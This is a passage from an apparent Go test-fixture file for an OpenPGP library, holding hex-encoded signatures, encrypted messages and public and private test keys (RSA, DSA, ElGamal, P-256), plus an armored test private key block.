const detachedSignatureHex = "889c04000102000605024d449cd1000a0910a34d7e18c20c31bb167603ff57718d09f28a519fdc7b5a68b6a3336da04df85e38c5cd5d5bd2092fa4629848a33d85b1729402a2aab39c3ac19f9d573f773cc62c264dc924c067a79dfd8a863ae06c7c8686120760749f5fd9b1e03a64d20a7df3446ddc8f0aeadeaeba7cbaee5c1e366d65b6a0c6cc749bcb912d2f15013f812795c2e29eb7f7b77f39ce77"
const detachedSignatureTextHex = "889c04010102000605024d449d21000a0910a34d7e18c20c31bbc8c60400a24fbef7342603a41cb1165767bd18985d015fb72fe05db42db36cfb2f1d455967f1e491194fbf6cf88146222b23bf6ffbd50d17598d976a0417d3192ff9cc0034fd00f287b02e90418bbefe609484b09231e4e7a5f3562e199bf39909ab5276c4d37382fe088f6b5c3426fc1052865da8b3ab158672d58b6264b10823dc4b39"
const detachedSignatureV3TextHex = "8900950305005255c25ca34d7e18c20c31bb0102bb3f04009f6589ef8a028d6e54f6eaf25432e590d31c3a41f4710897585e10c31e5e332c7f9f409af8512adceaff24d0da1474ab07aa7bce4f674610b010fccc5b579ae5eb00a127f272fb799f988ab8e4574c141da6dbfecfef7e6b2c478d9a3d2551ba741f260ee22bec762812f0053e05380bfdd55ad0f22d8cdf71b233fe51ae8a24"
const detachedSignatureDSAHex = "884604001102000605024d6c4eac000a0910338934250ccc0360f18d00a087d743d6405ed7b87755476629600b8b694a39e900a0abff8126f46faf1547c1743c37b21b4ea15b8f83"
const detachedSignatureP256Hex = "885e0400130a0006050256e5bb00000a0910d44a2c495918513edef001009841a4f792beb0befccb35c8838a6a87d9b936beaa86db6745ddc7b045eee0cf00fd1ac1f78306b17e965935dd3f8bae4587a76587e4af231efe19cc4011a8434817"
const testKeys1And2Hex = "988d044d3c5c10010400b1d13382944bd5aba23a4312968b5095d14f947f600eb478e14a6fcb16b0e0cac764884909c020bc495cfcc39a935387c661507bdb236a0612fb582cac3af9b29cc2c8c70090616c41b662f4da4c1201e195472eb7f4ae1ccbcbf9940fe21d985e379a5563dde5b9a23d35f1cfaa5790da3b79db26f23695107bfaca8e7b5bcd0011010001b41054657374204b6579203120285253412988b804130102002205024d3c5c10021b03060b090807030206150802090a0b0416020301021e01021780000a0910a34d7e18c20c31bbb5b304009cc45fe610b641a2c146331be94dade0a396e73ca725e1b25c21708d9cab46ecca5ccebc23055879df8f99eea39b377962a400f2ebdc36a7c99c333d74aeba346315137c3ff9d0a09b0273299090343048afb8107cf94cbd1400e3026f0ccac7ecebbc4d78588eb3e478fe2754d3ca664bcf3eac96ca4a6b0c8d7df5102f60f6b0020003b88d044d3c5c10010400b201df61d67487301f11879d514f4248ade90c8f68c7af1284c161098de4c28c2850f1ec7b8e30f959793e571542ffc6532189409cb51c3d30dad78c4ad5165eda18b20d9826d8707d0f742e2ab492103a85bbd9ddf4f5720f6de7064feb0d39ee002219765bb07bcfb8b877f47abe270ddeda4f676108cecb6b9bb2ad484a4f0011010001889f04180102000905024d3c5c10021b0c000a0910a34d7e18c20c31bb1a03040085c8d62e16d05dc4e9dad64953c8a2eed8b6c12f92b1575eeaa6dcf7be9473dd5b24b37b6dffbb4e7c99ed1bd3cb11634be19b3e6e207bed7505c7ca111ccf47cb323bf1f8851eb6360e8034cbff8dd149993c959de89f8f77f38e7e98b8e3076323aa719328e2b408db5ec0d03936efd57422ba04f925cdc7b4c1af7590e40ab0020003988d044d3c5c33010400b488c3e5f83f4d561f317817538d9d0397981e9aef1321ca68ebfae1cf8b7d388e19f4b5a24a82e2fbbf1c6c26557a6c5845307a03d815756f564ac7325b02bc83e87d5480a8fae848f07cb891f2d51ce7df83dcafdc12324517c86d472cc0ee10d47a68fd1d9ae49a6c19bbd36d82af597a0d88cc9c49de9df4e696fc1f0b5d0011010001b42754657374204b6579203220285253412c20656e637279707465642070726976617465206b65792988b804130102002205024d3c5c33021b03060b090807030206150802090a0b0416020301021e01021780000a0910d4984f961e35246b98940400908a73b6a6169f700434f076c6c79015a49bee37130eaf23aaa3cfa9ce60bfe4acaa7bc95f1146ada5867e0079babb38804891f4f0b8ebca57a86b249dee786161a755b7a342e68ccf3f78ed6440a93a6626beb9a37aa66afcd4f888790cb4bb46d94a4ae3eb3d7d3e6b00f6bfec940303e89ec5b32a1eaaacce66497d539328b0020003b88d044d3c5c33010400a4e913f9442abcc7f1804ccab27d2f787ffa592077ca935a8bb23165bd8d57576acac647cc596b2c3f814518cc8c82953c7a4478f32e0cf645630a5ba38d9618ef2bc3add69d459ae3dece5cab778938d988239f8c5ae437807075e06c828019959c644ff05ef6a5a1dab72227c98e3a040b0cf219026640698d7a13d8538a570011010001889f04180102000905024d3c5c33021b0c000a0910d4984f961e35246b26c703ff7ee29ef53bc1ae1ead533c408fa136db508434e233d6e62be621e031e5940bbd4c08142aed0f82217e7c3e1ec8de574bc06ccf3c36633be41ad78a9eacd209f861cae7b064100758545cc9dd83db71806dc1cfd5fb9ae5c7474bba0c19c44034ae61bae5eca379383339dece94ff56ff7aa44a582f3e5c38f45763af577c0934b0020003"
const testKeys1And2PrivateHex = "9501d8044d3c5c10010400b1d13382944bd5aba23a4312968b5095d14f947f600eb478e14a6fcb16b0e0cac764884909c020bc495cfcc39a935387c661507bdb236a0612fb582cac3af9b29cc2c8c70090616c41b662f4da4c1201e195472eb7f4ae1ccbcbf9940fe21d985e379a5563dde5b9a23d35f1cfaa5790da3b79db26f23695107bfaca8e7b5bcd00110100010003ff4d91393b9a8e3430b14d6209df42f98dc927425b881f1209f319220841273a802a97c7bdb8b3a7740b3ab5866c4d1d308ad0d3a79bd1e883aacf1ac92dfe720285d10d08752a7efe3c609b1d00f17f2805b217be53999a7da7e493bfc3e9618fd17018991b8128aea70a05dbce30e4fbe626aa45775fa255dd9177aabf4df7cf0200c1ded12566e4bc2bb590455e5becfb2e2c9796482270a943343a7835de41080582c2be3caf5981aa838140e97afa40ad652a0b544f83eb1833b0957dce26e47b0200eacd6046741e9ce2ec5beb6fb5e6335457844fb09477f83b050a96be7da043e17f3a9523567ed40e7a521f818813a8b8a72209f1442844843ccc7eb9805442570200bdafe0438d97ac36e773c7162028d65844c4d463e2420aa2228c6e50dc2743c3d6c72d0d782a5173fe7be2169c8a9f4ef8a7cf3e37165e8c61b89c346cdc6c1799d2b41054657374204b6579203120285253412988b804130102002205024d3c5c10021b03060b090807030206150802090a0b0416020301021e01021780000a0910a34d7e18c20c31bbb5b304009cc45fe610b641a2c146331be94dade0a396e73ca725e1b25c21708d9cab46ecca5ccebc23055879df8f99eea39b377962a400f2ebdc36a7c99c333d74aeba346315137c3ff9d0a09b0273299090343048afb8107cf94cbd1400e3026f0ccac7ecebbc4d78588eb3e478fe2754d3ca664bcf3eac96ca4a6b0c8d7df5102f60f6b00200009d01d8044d3c5c10010400b201df61d67487301f11879d514f4248ade90c8f68c7af1284c161098de4c28c2850f1ec7b8e30f959793e571542ffc6532189409cb51c3d30dad78c4ad5165eda18b20d9826d8707d0f742e2ab492103a85bbd9ddf4f5720f6de7064feb0d39ee002219765bb07bcfb8b877f47abe270ddeda4f676108cecb6b9bb2ad484a4f00110100010003fd17a7490c22a79c59281fb7b20f5e6553ec0c1637ae382e8adaea295f50241037f8997cf42c1ce26417e015091451b15424b2c59eb8d4161b0975630408e394d3b00f88d4b4e18e2cc85e8251d4753a27c639c83f5ad4a571c4f19d7cd460b9b73c25ade730c99df09637bd173d8e3e981ac64432078263bb6dc30d3e974150dd0200d0ee05be3d4604d2146fb0457f31ba17c057560785aa804e8ca5530a7cd81d3440d0f4ba6851efcfd3954b7e68908fc0ba47f7ac37bf559c6c168b70d3a7c8cd0200da1c677c4bce06a068070f2b3733b0a714e88d62aa3f9a26c6f5216d48d5c2b5624144f3807c0df30be66b3268eeeca4df1fbded58faf49fc95dc3c35f134f8b01fd1396b6c0fc1b6c4f0eb8f5e44b8eace1e6073e20d0b8bc5385f86f1cf3f050f66af789f3ef1fc107b7f4421e19e0349c730c68f0a226981f4e889054fdb4dc149e8e889f04180102000905024d3c5c10021b0c000a0910a34d7e18c20c31bb1a03040085c8d62e16d05dc4e9dad64953c8a2eed8b6c12f92b1575eeaa6dcf7be9473dd5b24b37b6dffbb4e7c99ed1bd3cb11634be19b3e6e207bed7505c7ca111ccf47cb323bf1f8851eb6360e8034cbff8dd149993c959de89f8f77f38e7e98b8e3076323aa719328e2b408db5ec0d03936efd57422ba04f925cdc7b4c1af7590e40ab00200009501fe044d3c5c33010400b488c3e5f83f4d561f317817538d9d0397981e9aef1321ca68ebfae1cf8b7d388e19f4b5a24a82e2fbbf1c6c26557a6c5845307a03d815756f564ac7325b02bc83e87d5480a8fae848f07cb891f2d51ce7df83dcafdc12324517c86d472cc0ee10d47a68fd1d9ae49a6c19bbd36d82af597a0d88cc9c49de9df4e696fc1f0b5d0011010001fe030302e9030f3c783e14856063f16938530e148bc57a7aa3f3e4f90df9dceccdc779bc0835e1ad3d006e4a8d7b36d08b8e0de5a0d947254ecfbd22037e6572b426bcfdc517796b224b0036ff90bc574b5509bede85512f2eefb520fb4b02aa523ba739bff424a6fe81c5041f253f8d757e69a503d3563a104d0d49e9e890b9d0c26f96b55b743883b472caa7050c4acfd4a21f875bdf1258d88bd61224d303dc9df77f743137d51e6d5246b88c406780528fd9a3e15bab5452e5b93970d9dcc79f48b38651b9f15bfbcf6da452837e9cc70683d1bdca94507870f743e4ad902005812488dd342f836e72869afd00ce1850eea4cfa53ce10e3608e13d3c149394ee3cbd0e23d018fcbcb6e2ec5a1a22972d1d462ca05355d0d290dd2751e550d5efb38c6c89686344df64852bf4ff86638708f644e8ec6bd4af9b50d8541cb91891a431326ab2e332faa7ae86cfb6e0540aa63160c1e5cdd5a4add518b303fff0a20117c6bc77f7cfbaf36b04c865c6c2b42754657374204b6579203220285253412c20656e637279707465642070726976617465206b65792988b804130102002205024d3c5c33021b03060b090807030206150802090a0b0416020301021e01021780000a0910d4984f961e35246b98940400908a73b6a6169f700434f076c6c79015a49bee37130eaf23aaa3cfa9ce60bfe4acaa7bc95f1146ada5867e0079babb38804891f4f0b8ebca57a86b249dee786161a755b7a342e68ccf3f78ed6440a93a6626beb9a37aa66afcd4f888790cb4bb46d94a4ae3eb3d7d3e6b00f6bfec940303e89ec5b32a1eaaacce66497d539328b00200009d01fe044d3c5c33010400a4e913f9442abcc7f1804ccab27d2f787ffa592077ca935a8bb23165bd8d57576acac647cc596b2c3f814518cc8c82953c7a4478f32e0cf645630a5ba38d9618ef2bc3add69d459ae3dece5cab778938d988239f8c5ae437807075e06c828019959c644ff05ef6a5a1dab72227c98e3a040b0cf219026640698d7a13d8538a570011010001fe030302e9030f3c783e148560f936097339ae381d63116efcf802ff8b1c9360767db5219cc987375702a4123fd8657d3e22700f23f95020d1b261eda5257e9a72f9a918e8ef22dd5b3323ae03bbc1923dd224db988cadc16acc04b120a9f8b7e84da9716c53e0334d7b66586ddb9014df604b41be1e960dcfcbc96f4ed150a1a0dd070b9eb14276b9b6be413a769a75b519a53d3ecc0c220e85cd91ca354d57e7344517e64b43b6e29823cbd87eae26e2b2e78e6dedfbb76e3e9f77bcb844f9a8932eb3db2c3f9e44316e6f5d60e9e2a56e46b72abe6b06dc9a31cc63f10023d1f5e12d2a3ee93b675c96f504af0001220991c88db759e231b3320dcedf814dcf723fd9857e3d72d66a0f2af26950b915abdf56c1596f46a325bf17ad4810d3535fb02a259b247ac3dbd4cc3ecf9c51b6c07cebb009c1506fba0a89321ec8683e3fd009a6e551d50243e2d5092fefb3321083a4bad91320dc624bd6b5dddf93553e3d53924c05bfebec1fb4bd47e89a1a889f04180102000905024d3c5c33021b0c000a0910d4984f961e35246b26c703ff7ee29ef53bc1ae1ead533c408fa136db508434e233d6e62be621e031e5940bbd4c08142aed0f82217e7c3e1ec8de574bc06ccf3c36633be41ad78a9eacd209f861cae7b064100758545cc9dd83db71806dc1cfd5fb9ae5c7474bba0c19c44034ae61bae5eca379383339dece94ff56ff7aa44a582f3e5c38f45763af577c0934b0020000"
const dsaElGamalTestKeysHex = "9501e1044dfcb16a110400aa3e5c1a1f43dd28c2ffae8abf5cfce555ee874134d8ba0a0f7b868ce2214beddc74e5e1e21ded354a95d18acdaf69e5e342371a71fbb9093162e0c5f3427de413a7f2c157d83f5cd2f9d791256dc4f6f0e13f13c3302af27f2384075ab3021dff7a050e14854bbde0a1094174855fc02f0bae8e00a340d94a1f22b32e48485700a0cec672ac21258fb95f61de2ce1af74b2c4fa3e6703ff698edc9be22c02ae4d916e4fa223f819d46582c0516235848a77b577ea49018dcd5e9e15cff9dbb4663a1ae6dd7580fa40946d40c05f72814b0f88481207e6c0832c3bded4853ebba0a7e3bd8e8c66df33d5a537cd4acf946d1080e7a3dcea679cb2b11a72a33a2b6a9dc85f466ad2ddf4c3db6283fa645343286971e3dd700703fc0c4e290d45767f370831a90187e74e9972aae5bff488eeff7d620af0362bfb95c1a6c3413ab5d15a2e4139e5d07a54d72583914661ed6a87cce810be28a0aa8879a2dd39e52fb6fe800f4f181ac7e328f740cde3d09a05cecf9483e4cca4253e60d4429ffd679d9996a520012aad119878c941e3cf151459873bdfc2a9563472fe0303027a728f9feb3b864260a1babe83925ce794710cfd642ee4ae0e5b9d74cee49e9c67b6cd0ea5dfbb582132195a121356a1513e1bca73e5b80c58c7ccb4164453412f456c47616d616c2054657374204b65792031886204131102002205024dfcb16a021b03060b090807030206150802090a0b0416020301021e01021780000a091033af447ccd759b09fadd00a0b8fd6f5a790bad7e9f2dbb7632046dc4493588db009c087c6a9ba9f7f49fab221587a74788c00db4889ab00200009d0157044dfcb16a1004008dec3f9291205255ccff8c532318133a6840739dd68b03ba942676f9038612071447bf07d00d559c5c0875724ea16a4c774f80d8338b55fca691a0522e530e604215b467bbc9ccfd483a1da99d7bc2648b4318fdbd27766fc8bfad3fddb37c62b8ae7ccfe9577e9b8d1e77c1d417ed2c2ef02d52f4da11600d85d3229607943700030503ff506c94c87c8cab778e963b76cf63770f0a79bf48fb49d3b4e52234620fc9f7657f9f8d56c96a2b7c7826ae6b57ebb2221a3fe154b03b6637cea7e6d98e3e45d87cf8dc432f723d3d71f89c5192ac8d7290684d2c25ce55846a80c9a7823f6acd9bb29fa6cd71f20bc90eccfca20451d0c976e460e672b000df49466408d527affe0303027a728f9feb3b864260abd761730327bca2aaa4ea0525c175e92bf240682a0e83b226f97ecb2e935b62c9a133858ce31b271fa8eb41f6a1b3cd72a63025ce1a75ee4180dcc284884904181102000905024dfcb16a021b0c000a091033af447ccd759b09dd0b009e3c3e7296092c81bee5a19929462caaf2fff3ae26009e218c437a2340e7ea628149af1ec98ec091a43992b00200009501e1044dfcb1be1104009f61faa61aa43df75d128cbe53de528c4aec49ce9360c992e70c77072ad5623de0a3a6212771b66b39a30dad6781799e92608316900518ec01184a85d872365b7d2ba4bacfb5882ea3c2473d3750dc6178cc1cf82147fb58caa28b28e9f12f6d1efcb0534abed644156c91cca4ab78834268495160b2400bc422beb37d237c2300a0cac94911b6d493bda1e1fbc6feeca7cb7421d34b03fe22cec6ccb39675bb7b94a335c2b7be888fd3906a1125f33301d8aa6ec6ee6878f46f73961c8d57a3e9544d8ef2a2cbfd4d52da665b1266928cfe4cb347a58c412815f3b2d2369dec04b41ac9a71cc9547426d5ab941cccf3b18575637ccfb42df1a802df3cfe0a999f9e7109331170e3a221991bf868543960f8c816c28097e503fe319db10fb98049f3a57d7c80c420da66d56f3644371631fad3f0ff4040a19a4fedc2d07727a1b27576f75a4d28c47d8246f27071e12d7a8de62aad216ddbae6aa02efd6b8a3e2818cda48526549791ab277e447b3a36c57cefe9b592f5eab73959743fcc8e83cbefec03a329b55018b53eec196765ae40ef9e20521a603c551efe0303020950d53a146bf9c66034d00c23130cce95576a2ff78016ca471276e8227fb30b1ffbd92e61804fb0c3eff9e30b1a826ee8f3e4730b4d86273ca977b4164453412f456c47616d616c2054657374204b65792032886204131102002205024dfcb1be021b03060b090807030206150802090a0b0416020301021e01021780000a0910a86bf526325b21b22bd9009e34511620415c974750a20df5cb56b182f3b48e6600a0a9466cb1a1305a84953445f77d461593f1d42bc1b00200009d0157044dfcb1be1004009565a951da1ee87119d600c077198f1c1bceb0f7aa54552489298e41ff788fa8f0d43a69871f0f6f77ebdfb14a4260cf9fbeb65d5844b4272a1904dd95136d06c3da745dc46327dd44a0f16f60135914368c8039a34033862261806bb2c5ce1152e2840254697872c85441ccb7321431d75a747a4bfb1d2c66362b51ce76311700030503fc0ea76601c196768070b7365a200e6ddb09307f262d5f39eec467b5f5784e22abdf1aa49226f59ab37cb49969d8f5230ea65caf56015abda62604544ed526c5c522bf92bed178a078789f6c807b6d34885688024a5bed9e9f8c58d11d4b82487b44c5f470c5606806a0443b79cadb45e0f897a561a53f724e5349b9267c75ca17fe0303020950d53a146bf9c660bc5f4ce8f072465e2d2466434320c1e712272fafc20e342fe7608101580fa1a1a367e60486a7cd1246b7ef5586cf5e10b32762b710a30144f12dd17dd4884904181102000905024dfcb1be021b0c000a0910a86bf526325b21b2904c00a0b2b66b4b39ccffda1d10f3ea8d58f827e30a8b8e009f4255b2d8112a184e40cde43a34e8655ca7809370b0020000"
const signedMessageHex = "a3019bc0cbccc0c4b8d8b74ee2108fe16ec6d3ca490cbe362d3f8333d3f352531472538b8b13d353b97232f352158c20943157c71c16064626063656269052062e4e01987e9b6fccff4b7df3a34c534b23e679cbec3bc0f8f6e64dfb4b55fe3f8efa9ce110ddb5cd79faf1d753c51aecfa669f7e7aa043436596cccc3359cb7dd6bbe9ecaa69e5989d9e57209571edc0b2fa7f57b9b79a64ee6e99ce1371395fee92fec2796f7b15a77c386ff668ee27f6d38f0baa6c438b561657377bf6acff3c5947befd7bf4c196252f1d6e5c524d0300"
const signedTextMessageHex = "a3019bc0cbccc8c4b8d8b74ee2108fe16ec6d36a250cbece0c178233d3f352531472538b8b13d35379b97232f352158ca0b4312f57c71c1646462606365626906a062e4e019811591798ff99bf8afee860b0d8a8c2a85c3387e3bcf0bb3b17987f2bbcfab2aa526d930cbfd3d98757184df3995c9f3e7790e36e3e9779f06089d4c64e9e47dd6202cb6e9bc73c5d11bb59fbaf89d22d8dc7cf199ddf17af96e77c5f65f9bbed56f427bd8db7af37f6c9984bf9385efaf5f184f986fb3e6adb0ecfe35bbf92d16a7aa2a344fb0bc52fb7624f0200"
const signedEncryptedMessageHex = "848c032a67d68660df41c70103ff5789d0de26b6a50c985a02a13131ca829c413a35d0e6fa8d6842599252162808ac7439c72151c8c6183e76923fe3299301414d0c25a2f06a2257db3839e7df0ec964773f6e4c4ac7ff3b48c444237166dd46ba8ff443a5410dc670cb486672fdbe7c9dfafb75b4fea83af3a204fe2a7dfa86bd20122b4f3d2646cbeecb8f7be8d2c03b018bd210b1d3791e1aba74b0f1034e122ab72e760492c192383cf5e20b5628bd043272d63df9b923f147eb6091cd897553204832aba48fec54aa447547bb16305a1024713b90e77fd0065f1918271947549205af3c74891af22ee0b56cd29bfec6d6e351901cd4ab3ece7c486f1e32a792d4e474aed98ee84b3f591c7dff37b64e0ecd68fd036d517e412dcadf85840ce184ad7921ad446c4ee28db80447aea1ca8d4f574db4d4e37688158ddd19e14ee2eab4873d46947d65d14a23e788d912cf9a19624ca7352469b72a83866b7c23cb5ace3deab3c7018061b0ba0f39ed2befe27163e5083cf9b8271e3e3d52cc7ad6e2a3bd81d4c3d7022f8d"
const signedEncryptedMessage2Hex = "85010e03cf6a7abcd43e36731003fb057f5495b79db367e277cdbe4ab90d924ddee0c0381494112ff8c1238fb0184af35d1731573b01bc4c55ecacd2aafbe2003d36310487d1ecc9ac994f3fada7f9f7f5c3a64248ab7782906c82c6ff1303b69a84d9a9529c31ecafbcdb9ba87e05439897d87e8a2a3dec55e14df19bba7f7bd316291c002ae2efd24f83f9e3441203fc081c0c23dc3092a454ca8a082b27f631abf73aca341686982e8fbda7e0e7d863941d68f3de4a755c2964407f4b5e0477b3196b8c93d551dd23c8beef7d0f03fbb1b6066f78907faf4bf1677d8fcec72651124080e0b7feae6b476e72ab207d38d90b958759fdedfc3c6c35717c9dbfc979b3cfbbff0a76d24a5e57056bb88acbd2a901ef64bc6e4db02adc05b6250ff378de81dca18c1910ab257dff1b9771b85bb9bbe0a69f5989e6d1710a35e6dfcceb7d8fb5ccea8db3932b3d9ff3fe0d327597c68b3622aec8e3716c83a6c93f497543b459b58ba504ed6bcaa747d37d2ca746fe49ae0a6ce4a8b694234e941b5159ff8bd34b9023da2814076163b86f40eed7c9472f81b551452d5ab87004a373c0172ec87ea6ce42ccfa7dbdad66b745496c4873d8019e8c28d6b3"
const symmetricallyEncryptedCompressedHex = "8c0d04030302eb4a03808145d0d260c92f714339e13de5a79881216431925bf67ee2898ea61815f07894cd0703c50d0a76ef64d482196f47a8bc729af9b80bb6"
const dsaTestKeyHex = "9901a2044d6c49de110400cb5ce438cf9250907ac2ba5bf6547931270b89f7c4b53d9d09f4d0213a5ef2ec1f26806d3d259960f872a4a102ef1581ea3f6d6882d15134f21ef6a84de933cc34c47cc9106efe3bd84c6aec12e78523661e29bc1a61f0aab17fa58a627fd5fd33f5149153fbe8cd70edf3d963bc287ef875270ff14b5bfdd1bca4483793923b00a0fe46d76cb6e4cbdc568435cd5480af3266d610d303fe33ae8273f30a96d4d34f42fa28ce1112d425b2e3bf7ea553d526e2db6b9255e9dc7419045ce817214d1a0056dbc8d5289956a4b1b69f20f1105124096e6a438f41f2e2495923b0f34b70642607d45559595c7fe94d7fa85fc41bf7d68c1fd509ebeaa5f315f6059a446b9369c277597e4f474a9591535354c7e7f4fd98a08aa60400b130c24ff20bdfbf683313f5daebf1c9b34b3bdadfc77f2ddd72ee1fb17e56c473664bc21d66467655dd74b9005e3a2bacce446f1920cd7017231ae447b67036c9b431b8179deacd5120262d894c26bc015bffe3d827ba7087ad9b700d2ca1f6d16cc1786581e5dd065f293c31209300f9b0afcc3f7c08dd26d0a22d87580b4db41054657374204b65792033202844534129886204131102002205024d6c49de021b03060b090807030206150802090a0b0416020301021e01021780000a0910338934250ccc03607e0400a0bdb9193e8a6b96fc2dfc108ae848914b504481f100a09c4dc148cb693293a67af24dd40d2b13a9e36794"
const dsaTestKeyPrivateHex = "9501bb044d6c49de110400cb5ce438cf9250907ac2ba5bf6547931270b89f7c4b53d9d09f4d0213a5ef2ec1f26806d3d259960f872a4a102ef1581ea3f6d6882d15134f21ef6a84de933cc34c47cc9106efe3bd84c6aec12e78523661e29bc1a61f0aab17fa58a627fd5fd33f5149153fbe8cd70edf3d963bc287ef875270ff14b5bfdd1bca4483793923b00a0fe46d76cb6e4cbdc568435cd5480af3266d610d303fe33ae8273f30a96d4d34f42fa28ce1112d425b2e3bf7ea553d526e2db6b9255e9dc7419045ce817214d1a0056dbc8d5289956a4b1b69f20f1105124096e6a438f41f2e2495923b0f34b70642607d45559595c7fe94d7fa85fc41bf7d68c1fd509ebeaa5f315f6059a446b9369c277597e4f474a9591535354c7e7f4fd98a08aa60400b130c24ff20bdfbf683313f5daebf1c9b34b3bdadfc77f2ddd72ee1fb17e56c473664bc21d66467655dd74b9005e3a2bacce446f1920cd7017231ae447b67036c9b431b8179deacd5120262d894c26bc015bffe3d827ba7087ad9b700d2ca1f6d16cc1786581e5dd065f293c31209300f9b0afcc3f7c08dd26d0a22d87580b4d00009f592e0619d823953577d4503061706843317e4fee083db41054657374204b65792033202844534129886204131102002205024d6c49de021b03060b090807030206150802090a0b0416020301021e01021780000a0910338934250ccc03607e0400a0bdb9193e8a6b96fc2dfc108ae848914b504481f100a09c4dc148cb693293a67af24dd40d2b13a9e36794"
const p256TestKeyHex = "98520456e5b83813082a8648ce3d030107020304a2072cd6d21321266c758cc5b83fab0510f751cb8d91897cddb7047d8d6f185546e2107111b0a95cb8ef063c33245502af7a65f004d5919d93ee74eb71a66253b424502d3235362054657374204b6579203c696e76616c6964406578616d706c652e636f6d3e8879041313080021050256e5b838021b03050b09080702061508090a0b020416020301021e01021780000a0910d44a2c495918513e54e50100dfa64f97d9b47766fc1943c6314ba3f2b2a103d71ad286dc5b1efb96a345b0c80100dbc8150b54241f559da6ef4baacea6d31902b4f4b1bdc09b34bf0502334b7754b8560456e5b83812082a8648ce3d030107020304bfe3cea9cee13486f8d518aa487fecab451f25467d2bf08e58f63e5fa525d5482133e6a79299c274b068ef0be448152ad65cf11cf764348588ca4f6a0bcf22b6030108078861041813080009050256e5b838021b0c000a0910d44a2c495918513e4a4800ff49d589fa64024ad30be363a032e3a0e0e6f5db56ba4c73db850518bf0121b8f20100fd78e065f4c70ea5be9df319ea67e493b936fc78da834a71828043d3154af56e"
const p256TestKeyPrivateHex = "94a50456e5b83813082a8648ce3d030107020304a2072cd6d21321266c758cc5b83fab0510f751cb8d91897cddb7047d8d6f185546e2107111b0a95cb8ef063c33245502af7a65f004d5919d93ee74eb71a66253fe070302f0c2bfb0b6c30f87ee1599472b8636477eab23ced13b271886a4b50ed34c9d8436af5af5b8f88921f0efba6ef8c37c459bbb88bc1c6a13bbd25c4ce9b1e97679569ee77645d469bf4b43de637f5561b424502d3235362054657374204b6579203c696e76616c6964406578616d706c652e636f6d3e8879041313080021050256e5b838021b03050b09080702061508090a0b020416020301021e01021780000a0910d44a2c495918513e54e50100dfa64f97d9b47766fc1943c6314ba3f2b2a103d71ad286dc5b1efb96a345b0c80100dbc8150b54241f559da6ef4baacea6d31902b4f4b1bdc09b34bf0502334b77549ca90456e5b83812082a8648ce3d030107020304bfe3cea9cee13486f8d518aa487fecab451f25467d2bf08e58f63e5fa525d5482133e6a79299c274b068ef0be448152ad65cf11cf764348588ca4f6a0bcf22b603010807fe0703027510012471a603cfee2968dce19f732721ddf03e966fd133b4e3c7a685b788705cbc46fb026dc94724b830c9edbaecd2fb2c662f23169516cacd1fe423f0475c364ecc10abcabcfd4bbbda1a36a1bd8861041813080009050256e5b838021b0c000a0910d44a2c495918513e4a4800ff49d589fa64024ad30be363a032e3a0e0e6f5db56ba4c73db850518bf0121b8f20100fd78e065f4c70ea5be9df319ea67e493b936fc78da834a71828043d3154af56e"
const armoredPrivateKeyBlock = `-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
lQHYBE2rFNoBBADFwqWQIW/DSqcB4yCQqnAFTJ27qS5AnB46ccAdw3u4Greeu3Bp
idpoHdjULy7zSKlwR1EA873dO/k/e11Ml3dlAFUinWeejWaK2ugFP6JjiieSsrKn
vWNicdCS4HTWn0X4sjl0ZiAygw6GNhqEQ3cpLeL0g8E9hnYzJKQ0LWJa0QARAQAB
AAP/TB81EIo2VYNmTq0pK1ZXwUpxCrvAAIG3hwKjEzHcbQznsjNvPUihZ+NZQ6+X
0HCfPAdPkGDCLCb6NavcSW+iNnLTrdDnSI6+3BbIONqWWdRDYJhqZCkqmG6zqSfL
IdkJgCw94taUg5BWP/AAeQrhzjChvpMQTVKQL5mnuZbUCeMCAN5qrYMP2S9iKdnk
VANIFj7656ARKt/nf4CBzxcpHTyB8+d2CtPDKCmlJP6vL8t58Jmih+kHJMvC0dzn
gr5f5+sCAOOe5gt9e0am7AvQWhdbHVfJU0TQJx+m2OiCJAqGTB1nvtBLHdJnfdC9
TnXXQ6ZXibqLyBies/xeY2sCKL5qtTMCAKnX9+9d/5yQxRyrQUHt1NYhaXZnJbHx
q4ytu0eWz+5i68IYUSK69jJ1NWPM0T6SkqpB3KCAIv68VFm9PxqG1KmhSrQIVGVz
dCBLZXmIuAQTAQIAIgUCTasU2gIbAwYLCQgHAwIGFQgCCQoLBBYCAwECHgECF4AA
CgkQO9o98PRieSoLhgQAkLEZex02Qt7vGhZzMwuN0R22w3VwyYyjBx+fM3JFETy1
ut4xcLJoJfIaF5ZS38UplgakHG0FQ+b49i8dMij0aZmDqGxrew1m4kBfjXw9B/v+
eIqpODryb6cOSwyQFH0lQkXC040pjq9YqDsO5w0WYNXYKDnzRV0p4H1pweo2VDid
AdgETasU2gEEAN46UPeWRqKHvA99arOxee38fBt2CI08iiWyI8T3J6ivtFGixSqV
bRcPxYO/qLpVe5l84Nb3X71GfVXlc9hyv7CD6tcowL59hg1E/DC5ydI8K8iEpUmK
/UnHdIY5h8/kqgGxkY/T/hgp5fRQgW1ZoZxLajVlMRZ8W4tFtT0DeA+JABEBAAEA
A/0bE1jaaZKj6ndqcw86jd+QtD1SF+Cf21CWRNeLKnUds4FRRvclzTyUMuWPkUeX
TaNNsUOFqBsf6QQ2oHUBBK4VCHffHCW4ZEX2cd6umz7mpHW6XzN4DECEzOVksXtc
lUC1j4UB91DC/RNQqwX1IV2QLSwssVotPMPqhOi0ZLNY7wIA3n7DWKInxYZZ4K+6
rQ+POsz6brEoRHwr8x6XlHenq1Oki855pSa1yXIARoTrSJkBtn5oI+f8AzrnN0BN
oyeQAwIA/7E++3HDi5aweWrViiul9cd3rcsS0dEnksPhvS0ozCJiHsq/6GFmy7J8
QSHZPteedBnZyNp5jR+H7cIfVN3KgwH/Skq4PsuPhDq5TKK6i8Pc1WW8MA6DXTdU
nLkX7RGmMwjC0DBf7KWAlPjFaONAX3a8ndnz//fy1q7u2l9AZwrj1qa1iJ8EGAEC
AAkFAk2rFNoCGwwACgkQO9o98PRieSo2/QP/WTzr4ioINVsvN1akKuekmEMI3LAp
BfHwatufxxP1U+3Si/6YIk7kuPB9Hs+pRqCXzbvPRrI8NHZBmc8qIGthishdCYad
AHcVnXjtxrULkQFGbGvhKURLvS9WnzD/m1K2zzwxzkPTzT9/Yf06O6Mal5AdugPL
VrM0m72/jnpKo04=
=zNCn
-----END PGP PRIVATE KEY BLOCK-----`
const e2ePublicKey = `-----BEGIN PGP PUBLIC KEY BLOCK-----
Charset: UTF-8
